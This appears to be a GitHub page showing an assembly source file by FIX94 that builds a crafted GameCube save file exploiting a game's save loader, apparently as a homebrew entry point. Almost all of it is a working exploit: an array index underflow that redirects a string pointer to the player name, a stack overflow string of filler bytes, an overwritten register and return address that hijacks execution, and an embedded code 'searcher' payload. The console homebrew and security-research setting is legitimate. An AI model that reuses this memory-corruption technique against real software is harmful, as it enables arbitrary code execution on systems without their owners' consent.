Skip to content
Branch: master
Find file Copy path
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
52 lines (44 sloc) 1.35 KB
// Copyright 2016 FIX94
// This code is licensed to you under the terms of the GNU GPL, version 2;
// see file LICENSE or
.section .fstart,"ax"
.globl fbegin
0: // gci "header" we use
.incbin "ggye.hdr"
// save start
.long 0x55424953
.long 0x4F465400
// player name, will be used for pointer
// on mem to our overflow string
.long 0x80DE2768 //will be 0x8053C414 on stack
.long 0x80DE2768 //will be 0x8053C418 on stack
.byte 0
// save settings
.short 0x5249
.long 1 ; .long 0
.long 1 ; .long 0
.long 1 ; .long 0
.long 3 ; .long 0
.long 0
// this index underflows a string pointer array at 0x80DE1F70 to point to the
// player name on stack (0x8053C414) where we set pointers to our overflow string
.long 0xFFF47863
// more settings
.fill 0x35,1,0x00
// time to set up our overflow string at 0x80DE2768
.fill 0x80,1,0x41
// r28, point to stack position of our code
.long 0x8053C384
// r29,r30,r31, stack store position, arent using those
.fill 0x10,1,0x41
// This function will execute code further down the stack
.long 0x802BFE24
// more overflow string filler
.fill 0xD,1,0x41
// this is actually required for the save to be "valid"
.byte 1
// last of the overflow string filler
.fill 0xE,1,0x41
// Our stack code searcher that gets executed from above
.incbin "searcher.bin"
You can’t perform that action at this time.